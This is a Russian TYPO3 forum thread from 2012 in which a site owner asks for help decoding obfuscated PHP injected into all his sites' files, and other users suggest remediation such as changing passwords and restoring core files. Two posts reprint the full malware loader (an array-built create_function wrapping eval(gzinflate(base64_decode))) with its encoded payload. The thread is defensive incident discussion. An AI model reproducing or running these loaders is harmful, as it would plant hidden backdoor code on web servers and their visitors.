Russian TYPO3 community
Страница 1 из 2 1 2
Показывать 40 сообщений этой темы на одной странице

Russian TYPO3 community (http://forum.typo3.ru/index.php)
-   Общие вопросы (http://forum.typo3.ru/forumdisplay.php?f=12)
-   -   Помогите что за вирус? (http://forum.typo3.ru/showthread.php?t=10374)

semender 25.10.2012 15:40
Помогите что за вирус?
 
недавно на всех typo3 сайтах на одном из моих серверов, во всех php файлах обнаружил добавленным такой код. Вот пытаюсь расшифровать, никак не выходит, помогите пожалуйста.

PHP код:
$md5 "89bc86968a0ff8960b640edcf06de95e";
$a6 = array('t',"_","6",'4',"n",'z','g','c',")",'s','f',"l","i","a","v",'b','$','d',"e","o",';',"r",'(');
$b65 create_function('$'.'v',$a6[18].$a6[14].$a6[13].$a6[11].$a6[22].$a6[6].$a6[5].$a6[12].$a6[4].$a6[10].$a6[11].$a6[13].$a6[0].$a6[18].$a6[22].$a6[15].$a6[13].$a6[9].$a6[18].$a6[2].$a6[3].$a6[1].$a6[17].$a6[18].$a6[7].$a6[19].$a6[17].$a6[18].$a6[22].$a6[16].$a6[14].$a6[8].$a6[8].$a6[8].$a6[20]);
$b65('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'); 
видно что создается функция
PHP код:
function  lambda($v)
{
return eval(gzinflate(base64_decode($v)));
}; 
Но при вызове в таком порядке текст всё равно не читаем.

Ивано 25.10.2012 18:49
Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...

Ивано 25.10.2012 18:51
Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...

dmartynenko 25.10.2012 20:08
А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).

semender 25.10.2012 23:00
Цитата:
Сообщение от Ивано (Сообщение 34761)
Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...
да да, я так и делаю: в ext отчищаю вручную,файлы движка заменяю оригинальными из новоскаченного, перенес все сайты на другой сервер,переустановил этот. Сейчас мне интересно что ж он делает та такого злодейского)

semender 25.10.2012 23:04
Цитата:
Сообщение от Ивано (Сообщение 34762)
Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...
я понял что выполняется, только вот как раскодировать последнее???
ну так это и есть всё что есть, в каждом файле такое, свой md5 и свой массив.Но функция одна и та же по видимому.
PHP код:
<?php
$md5 "b7673e7d076c0db93f15da24c610a75e";
$a6 = array(";",'l',"(","z","a",'n','d','$',"_","4",'t','g','v',"r",'c',"6","f",'e',"i",'s',')','b','o');
$b61 create_function('$'.'v',$a6[17].$a6[12].$a6[4].$a6[1].$a6[2].$a6[11].$a6[3].$a6[18].$a6[5].$a6[16].$a6[1].$a6[4].$a6[10].$a6[17].$a6[2].$a6[21].$a6[4].$a6[19].$a6[17].$a6[15].$a6[9].$a6[8].$a6[6].$a6[17].$a6[14].$a6[22].$a6[6].$a6[17].$a6[2].$a6[7].$a6[12].$a6[20].$a6[20].$a6[20].$a6[0]);
$b61('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');
?>

semender 25.10.2012 23:11
Цитата:
Сообщение от dmartynenko (Сообщение 34764)
А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).
Вроде никаких сторонних скриптов нет...Стоит ещё wordpress на серваке.Интересно что его даже не затронуло,там этого кода ни в каких файлах нет.Почему-то именно typo3.

Ивано 25.10.2012 23:39
Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));


Мурашки по коже...

semender 25.10.2012 23:43
Цитата:
Сообщение от Ивано (Сообщение 34772)
Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));


Мурашки по коже...
Эт я просто написал, create_function — Создаёт анонимную (лямбда) функцию, чтоб легче подставить можно было для выполнения.Скопировал с кода, когда тэстил.

Ивано 25.10.2012 23:50
Каково значение переменной $v?
eval(gzinflate(base64_decode($v))); - что сюда передается?


Часовой пояс GMT +4, время: 06:33.
Страница 1 из 2 1 2
Показывать 40 сообщений этой темы на одной странице

Работает на vBulletin® версия 3.8.1.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot